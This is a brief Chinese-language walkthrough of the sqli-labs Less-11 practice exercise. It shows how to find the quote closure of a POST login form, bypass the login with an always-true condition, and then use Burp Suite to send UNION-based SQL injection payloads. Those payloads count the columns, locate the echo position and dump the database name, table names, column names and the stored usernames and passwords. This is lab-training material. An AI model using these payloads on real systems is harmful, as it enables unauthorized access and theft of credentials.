提交后页面报错,
添加注释符试试
依旧报错,
换个注释符试试
页面正常
可判断为单引号闭合
打开burpsuite,
URL中%27是单引号',%23是井号#
第一步,判断闭合方式嘛,单引号闭合
尝试使用万能登录 1' or 1=1#
登陆成功!!!!!!
进入目录D:\LeStoreDownload\phpStudyjiayou\phpstudy_pro\WWW\sqli-labs-master\Less-11
打开index.php
查看sql语句
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
输入1' or 1=1#
SELECT username, password FROM users WHERE username='1' or 1=1
因为1=1为永真式,与前面的or结合,再加上注释符注释掉and后面的语句,where后语句直接为真。
变为SELECT username, password FROM users
利用sql注入拿到数据库信息
判断所在数据库中表的字段数
在burpsuite中输入
uname=1' or '1'='1 &passwd=1' order by 3 #&submit=Submit
或
报错,
试试其他的吧 username=1' or '1'='1 password=1' order by 2#
所以字段数为2,
第三步,判断回显位
uname=1' or '1'='1 &passwd=1'union select 1,2 #&submit=Submit
第四步,爆破数据库名
uname=1' or '1'='1 &passwd=1'union select 1,database() #&submit=Submit
爆表名
uname=1' or '1' = '1&passwd=1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security')#&submit=Submit
爆字段名
uname=1' or '1' = '1&passwd=1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users')#&submit=Submit
爆数据
uname=1' or '1' = '1&passwd=1' union select 1,(select group_concat(id,username,password)from users)#&submit=Submit
END!!!